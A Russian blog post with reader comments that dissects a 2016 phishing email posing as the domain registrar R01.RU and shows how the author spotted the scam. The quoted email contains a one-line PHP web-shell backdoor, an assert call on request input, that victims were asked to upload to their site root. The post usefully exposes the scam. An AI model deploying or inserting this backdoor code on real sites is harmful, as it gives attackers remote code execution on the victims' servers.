?

Log in

No account? Create an account

Декабрь 22, 2016


Previous Entry Поделиться Next Entry
04:13 pm - Кульные хацкеры ататат

Получаю письмо. Тут надо заметить, что письма у меня смотрятся не через браузер, а через специальный почтовый клиент, собирающий письма с нескольких адресов (рабочего, личного, запасного). В клиенте письма показываются строго как голый текст, никакого HTML. Поэтому ухищрения менее умелых кульных хацкеров, пытающихся захватить тот или иной принадлежащий мне сайт или доменное имя, видны как на ладони.

Отправитель: "R01.RU"
Тема: Необходима активация домена [один из моих доменов]

Текст:
Уважаемый клиент!

В соответствии с изменениями, внесенными в ICANN RAA, Вы должны подтвердить, что фактическое управление доменом domain.ru осуществляется лицом, указанным в качестве его администратора.

Чтобы подтвердить, что Вы имеете фактическую возможность управлять доменом, создайте в корневой директории сайта файл a7offau12fn0f83f.php со следующим содержимым:

<?php
assert(stripslashes($_REQUEST[R01]));
?>

Файл должен быть создан в течение трех рабочих дней с момента получения настоящего письма и находиться на сервере до 28 декабря 2016 года, 20:00 (UTC+03:00), в противном случае процедура подтверждения не будет пройдена.

Обращаем Ваше внимание на то, что если процедура подтверждения не будет пройдена, делегирование домена будет приостановлено.

© АО "Регистратор Р01"
8-800-775-37-77,
8-495-616-2747

Вы подписались на рассылку в настройках уведомлений.
Отписаться от рассылки

Что сразу бросается в глаза?
Что для показа в HTML адрес отправителя будет выглядеть как R01.RU, а это домен одного из регистраторов доменных имён. Но в действительности, как мы видим, настоящий адрес, с которого отправлено письмо - info@r01l.ru. Одна лишняя буква в доменном имени. А я же, видите ли, редактор. Мне лишние буквы полагается видеть.
Попытка же увидеть, что находится на домене r01l.ru, приводит... да ни к чему не приводит: ничего заслуживающего внимания там нет. Может так быть, если бы это был действительно сайт уважаемого официального регистратора доменов? Конечно, нет.

Оставим в стороне ещё и тот факт, что ни на какие рассылки R01.RU я не подписывался, мало того - домен, который тут у меня пытаются отжать, регистрировал через совсем другую контору.

В глаза бросается также то, что меня пытаются заставить положить в корень сайта исполняемый код. Да-да. Если на сайте есть поддержка php, то предлагаемый код будет выполнять любой запрос переменной [R01]. А в эту переменную можно ввести что угодно, включая программу захвата власти во Вселенной.

Другое дело, что на этом самом сайте никакой поддержки php нет, но это уже детали.

И ещё в глаза бросаются слова "фактическое управление доменом domain.ru". Тут у них должен был подставляться тот домен, управление которым они пытаются захватить. Но он у них не подставляется, потому что они криворукие. Так и шлётся письмо - с требованием подтвердить фактическое управление... совсем другим доменом, принадлежащим, в дополнение ко всему этому абсурду, другому регистратору доменов, компании SALENAMES!

При этом домен, который у меня пытаются отжать, у меня не один: у меня много других доменов, и я знаю, что подлинный регистратор доменных имён решает вопросы подтверждения владельца домена совсем-совсем другим способом - уж во всяком случае не посредством установки на соответствующие сайты исполняемого кода.

В общем, низачот вам, кульные хацкеры. Идите в пень.

(8 бодрых выступлений | Бодро выступить)

Comments:


[User Picture]
From:lexizli
Date:Декабрь 22, 2016 10:50 am
(Link)
:-)))

Вчера от Ру-центра письмо пришло:

Уважаемый клиент!

Некоторые наши клиенты получили письма от имени RU-CENTER c требованием разместить в корневой директории сайта вредоносный файл якобы для подтверждения права владения доменом. Такие письма рассылаются мошенниками по адресам, находящимся в открытом доступе.

Мы никогда не требуем подтвердить право на домен таким способом и не запрашиваем у клиентов пароли в электронных письмах, а сообщения об изменениях в наших настоящих уведомлениях всегда сопровождаются ссылками на оригиналы документов.


Как раз про этот немудреный способ.
[User Picture]
From:wolk_off
Date:Декабрь 22, 2016 11:00 am
(Link)
Ну, Ру-центр молодец, чо :)
[User Picture]
From:senormouse
Date:Декабрь 22, 2016 10:52 am
(Link)
Хочу видеть администраторов тех доменов, которые они таким образом хакнули.
[User Picture]
From:wolk_off
Date:Декабрь 22, 2016 11:00 am
(Link)
Любой не-программист, купивший у хостера готовый набор "сайт с CMS + домен". Не-программист может увидеть криворукость хацкеров - я же увидел; но для этого ему нужно, например, лет 15 повариться в деле создания / поддержки сайтов, хотя бы по самым верхам, как мне довелось.
[User Picture]
From:senormouse
Date:Декабрь 22, 2016 11:07 am
(Link)
Да тут не в программизме дело. Сами действия очень неконвенциональные, контринтуитивные для такой процедуры. Обычный усер просто файл создать не сможет, скорее всего. Или наберет его в ворде :)
[User Picture]
From:wolk_off
Date:Декабрь 22, 2016 12:09 pm
(Link)
В общем, низачот уже по шести позициям :)
[User Picture]
From:oryx_and_crake
Date:Декабрь 22, 2016 01:19 pm
(Link)
Дорогой пользователь! Мы, узбекские программисты, написали вирус, но мы пока еще не очень хорошо умеем программировать. Поэтому убедительно просим вас переслать это письмо всем своим контактам, а потом отформатировать жесткий диск своего компьютера...
[User Picture]
From:wolk_off
Date:Декабрь 22, 2016 01:32 pm
(Link)
Ну, справедливости ради, разослали они сами!
Кульные хацкеры ататат - Заметки о не вполне существенном

> Свежие записи
> Архив
> Друзья
> Личная информация
> Хромепага (Мошков.Нет)

Rambler&apos;s Top100

Links
Cyril Moshkow's Blog in English
Портал Jazz.Ru
Журнал "Джаз.Ру"
Фантастика Кирилла Мошкова в Библиотеке Мошкова
Купить книги Кирилла Мошкова на LitRes
Книга "Блюз. Введение в историю"
Тяжёлые редакторские будни: "Редактирую и плачу"

> Go to Top
LiveJournal.com